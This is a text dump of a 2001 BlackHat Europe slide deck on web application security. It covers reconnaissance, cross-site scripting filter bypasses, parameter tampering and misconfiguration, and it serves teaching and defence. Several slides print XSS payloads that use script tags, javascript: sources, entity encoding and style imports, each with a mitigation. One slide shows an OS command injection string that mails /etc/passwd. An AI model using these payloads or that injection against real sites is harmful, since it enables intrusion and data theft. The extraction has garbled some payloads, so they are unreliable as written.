Bh europe-01-grossman


Published on

web application

  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Bh europe-01-grossman

  1. 1. Web Application Security"The Land that Information Security Forgot." BlackHat Europe 2001 Jeremiah Grossman WhiteHat Security 2001(c)WhiteHat Security, Inc.
  2. 2. Topics Web Application Security LandscapeCommon Web Application Security Mistakes Web Application Attack Methodologies  Information & Discovery  Input Manipulation/Parameter Tampering  Authentication/Authorization  System Mis-Configurations
  3. 3. What is a Web Application? A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent. 2001(c)WhiteHat Security, Inc.
  4. 4. LAYERS2001(c)WhiteHat Security, Inc.
  5. 5. What is Web Application Security?Simply, Web Application Security is... “The securing of web applications.” 2001(c)WhiteHat Security, Inc.
  6. 6. FIREWALL2001(c)WhiteHat Security, Inc.
  7. 7. SSL2001(c)WhiteHat Security, Inc.
  8. 8. Common Web Application Security Mistakes 2001(c)WhiteHat Security, Inc.
  9. 9. Trusting Client-Side Data DO NOT TRUST CLIENT-SIDE DATA! Identify all input parameters that trust client-side data. 2001(c)WhiteHat Security, Inc.
  10. 10. Unescaped Special Characters ! @ $ % ^ & * ( ) -_ + ` ~ | [ ] { } ; : " ? / , . > < Check for: Unescaped special characters within input strings 2001(c)WhiteHat Security, Inc.
  11. 11. HTML Character Filtering Proper handling of special characters > => &gt; < => &lt; " => &quot; & => &amp;Null characters should all be removed. %00 2001(c)WhiteHat Security, Inc.
  12. 12. More mistakes…Authentication mechanisms using technologies suchas JavaScript or ActiveX.Lack of re-authenticating the user before issuing newpasswords or performing critical tasks.Hosting of uncontrolled data on a protected domain. 2001(c)WhiteHat Security, Inc.
  13. 13. Information & Discovery  Spidering/Site Crawling  Identifiable Characteristics  Errors and Response Codes  File/Application Enumeration  Network Reconnaissance 2001(c)WhiteHat Security, Inc.
  14. 14. Spidering/Site Crawling Site Map  Hidden Services Service Map  CGIs and Forms Documentation  Email addresses Tools: WGET 2001(c)WhiteHat Security, Inc.
  15. 15. Identifiable Characteristics Comment Lines URL Extensions Meta Tags Cookies Client-Side scripting languages 2001(c)WhiteHat Security, Inc.
  16. 16. Error and Response Codes HTTP Response Headers Error Messages 2001(c)WhiteHat Security, Inc.
  17. 17. File/Application EnumerationCommonly referred to as “forced browsing” or “CGIScanning”.Directory BrowsingIndex Listings Tools: Whisker 2001(c)WhiteHat Security, Inc.
  18. 18. Network ReconnaissanceWHOISARIN Scan Nmap Scan (Nmap or HPING) Reverse DNSDNS Zone Transfer (DIG) 2001(c)WhiteHat Security, Inc.
  19. 19. Input Manipulation Parameter Tampering "Twiddling Bits." Cross-Site Scripting Filter-Bypass Manipulation OS Commands Meta Characters Path/Directory Traversal Hidden Form Field Manipulation HTTP Headers 2001(c)WhiteHat Security, Inc.
  20. 20. Cross-Site Scripting Bad name given to a dangerous security issueAttack targets the user of the system ratherthan the system itself.Outside client-side languages executing withinthe users web environment with the same levelof privilege as the hosted site. 2001(c)WhiteHat Security, Inc.
  21. 21. Client-Side Scripting LanguagesDHTML (HTML, XHTML, HTML x.0)JavaScript (1.x)Java (Applets)VBScriptFlashActiveXXML/XSLCSS 2001(c)WhiteHat Security, Inc.
  22. 22. Accessing the DOM & Outside the DOMDocument Object Model (DOM)Client-Side languages possess an enormous amount ofpower to access and manipulate the DOM within abrowser.Complex & diverse interconnections create an increasedthe level of access within the DOM.Increased level of access to read & modify DOM dataranging anything from background colors, to a file onyour systems, and beyond to executing systems calls. 2001(c)WhiteHat Security, Inc.
  23. 23. CSS Danger “The Remote Launch Pad.”Successfully CSS a user via a protected domain.Utilizing a Client-Side utility (JavaScript, ActiveX,VBScript, etc.), exploit a browser hole to downloada trojan/virus.User is unknowingly infected/compromised withina single HTTP page load.
  24. 24. Dangerous HTML “it’s all bad.”<APPLET><BODY><EMBED><FRAME><FRAMESET><HTML><IFRAME><IMG><LAYER><ILAYER><META><OBJECT><SCRIPT><STYLE>ATTRIBUTE DANGER LIST(Any HTML Tag that has these attributes) STYLE SRC HREF TYPE 2001(c)WhiteHat Security, Inc.
  25. 25. Filter Bypassing "JavaScript is a Cockroach"There are all kinds of input filters web applicationsimplement to sanitize data.This section will demonstrate many known ways inputfilters can be bypassed to perform malicious functionssuch as, cross-scripting, browser-hijacking, cookie theft,and others.Client-Side Scripting (CSS) attacks require the executionof either, JavaScript, Java, VBScript, ActiveX, Flash andsome others.We will be assuming that these web applications acceptHTML, at least in a limited sense. 2001(c)WhiteHat Security, Inc.
  26. 26. Testing the FiltersSubmit all the raw HTML tags you can find, and thenview the output results.Combine HTML with tag attributes, such as SRC,STYLE, HREF and OnXXX (JavaScript EventHandler).This will show what HTML is allowed, what thechanges were, and possible what dangerous HTMLcan be exploited. 2001(c)WhiteHat Security, Inc.
  27. 27. SCRIPT TAGDescription: The script tag is the simplest form ofinputting JavaScriptExploit:<SCRIPT>alert(JavaScript Executed);</SCRIPT>Solution: replace all "script" tags. 2001(c)WhiteHat Security, Inc.
  28. 28. SRCing JavaScript ProtocolDescription: The JavaScript protocol will execute theexpression entered after the colon. Netscape Tested.Exploit: <IMG SRC="javascript:alert(JavaScriptExecuted);">Solution: Replace "javascript" strings in all SRC & HREFattributes in HTML tags with another string.Exp: <IMG SRC="java_script:alert(JavaScript Executed);">will render this script useless.Further Information:Any HTML tag with a SRC attribute will execute this script onpage load or on link activation.As a further protocol pattern matching, keywords "livescript" and "mocha" must be also replaced for the hold the same possibilities.*** Netscape code names *** 2001(c)WhiteHat Security, Inc.
  29. 29. SRCing JavaScript Protocol w/ HTML EntitiesDescription: As another derivative of the previous, DecimalHTML entities within these strings can cause filter bypass.Exploit:<IMG SRC="javasc ript:alert(JavaScript Executed);">Replacement of entities 10 - 11 - 12 - 13 will also succeed.Hex instead of Decimal HTML entities will also bypass inputfilters and execute.<IMG SRC="javasc ript:alert(JavaScript Executed);">As well as placing multiple ZEROs in front.<IMG SRC=javasc ript:alert(JavaScript Executed);>Solution:Filter these entities within the string then do your further patternmatching 2001(c)WhiteHat Security, Inc.
  30. 30. AND CURLYDescription:Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.Exploit:<IMG SRC="&{alert(JavaScript Executed)};">Solution:<IMG SRC="XXalert(JavaScript Executed)};">or something similar will nullify the problem. 2001(c)WhiteHat Security, Inc.
  31. 31. Style Tag ConversionDescription: Turn a style tag into a JavaScript expression.Exploit:<style TYPE="text/javascript">JS EXPRESSION</style>Solution: Replace the "javascript" string with "java_script" and all should be fine.Exploit: Import dangerous CSS.<STYLE type=text/css>@import url(http://server/very_bad.css);</STYLE>Solution: Filter and replace the "@import“Exploit: Import a JavaScript Expression through a style tag.<style TYPE="text/css">@import url(javascript:alert(JavaScript Executed)); IE HOLE</style>Solution: Again, filter and replace the "@import" and the "javascript:" justto be safe. 2001(c)WhiteHat Security, Inc.
  32. 32. Twiddling BitsOS CommandsMeta CharactersPath/Directory Traversal 2001(c)WhiteHat Security, Inc.
  33. 33. Power of the Semi-Colon piping input to the command line.OS CommandsNormal:;+sendmail+/etc/passwdShell pipes and re-directs can also be used.
  34. 34. Power of the Semi-Colon piping input to the command line.Meta CharactersNormal:*
  35. 35. Power of the Semi-Colon piping input to the command line.Path Directory TraversalNormal:
  36. 36. More bits…Hidden Form Field ManipulationHTTP Headers 2001(c)WhiteHat Security, Inc.
  37. 37. Authentication/Authorization “Hand in the cookie jar.”Cookies are restricted to domains ( data on a restricted domain can accessthe cookie data.JavaScript Expression: "document.cookie"window.opendocument.img.srcHidden Form data is passed to a CGI through a GET request to a offdomain host. 2001(c)WhiteHat Security, Inc.
  38. 38. System Mis-Configurations “patches, patches, and more patches…" Vendor Patches Default AccountsCheck:Web Server permission by directory browsingSoftware version from DiscoveryKnown default accounts in commercial platformsBugTraqAnonymous FTP open on Web Server 2001(c)WhiteHat Security, Inc.
  39. 39. Introducing OWASP Open Web Application Security Project http://www.owasp.orgThe "Open Web Application Security Project" or OWASPis a community effort focused on definingRecommendations, Specifications and Methodologiesfor Designing, Developing, Deploying and Testing thesecurity of web enabled applications or web services.The "Open Web Application Security Project" or OWASPis based on an idea from the participants of the www-mobile-code mailing list at securityfocus.comYou can join the mailing list by 2001(c)WhiteHat Security, Inc.
  40. 40. Thank You. Questions? Jeremiah Grossman ·· · WhiteHat Security ·